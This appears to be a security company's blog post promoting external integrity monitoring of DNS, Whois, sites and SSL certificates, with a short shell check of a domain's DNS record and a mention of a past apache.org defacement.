
How do you guarantee that the integrity of your data is intact? How do you guarantee that the integrity of your Internet presence (of your brand, your site) is intact?

If you remember the last time twitter was hacked: the attackers didn't get access to its servers; they attacked its registrar and modified the DNS to point to another system. Nothing twitter could have protected against from the inside.

That's where cloud-based (or web-based) integrity monitoring comes into play. As we become more decentralized, we need a way to verify, from the outside, that our external data is still intact.
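The core of such an external check can be as simple as comparing a live answer against what you expect (a sketch with placeholder values):

$ # verify the A record for your domain from an outside resolver
$ EXPECTED="203.0.113.10"
$ LIVE=$(dig +short example.com A @8.8.8.8 | head -n1)
$ [ "$LIVE" = "$EXPECTED" ] || echo "DNS for example.com changed: now pointing to $LIVE"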

Well, that's what our company does. We offer a cloud-based integrity monitoring solution that verifies that your Internet presence has not been altered. We monitor your DNS, your Whois information, your web sites, your blacklist status (at multiple databases), and your SSL certificates, and alert you whenever their integrity changes.

How useful is it? By watching the integrity of this data, we can detect malware injection, spam, defacements, attempts to steal domains, database errors, and even your site simply going offline. Curious to try it? Visit http://sucuri.net and let us know what you think.

Screenshot of the apache.org defacement (10 years ago)

We recently published a case study of the apache.org defacement that happened 10 years ago. You can read it here: Apache.org defaced – Security archive case study

We didn't publish the screenshot of the defacement, but our friend @EdiStrosar sent us a link to it. Check it out; very funny…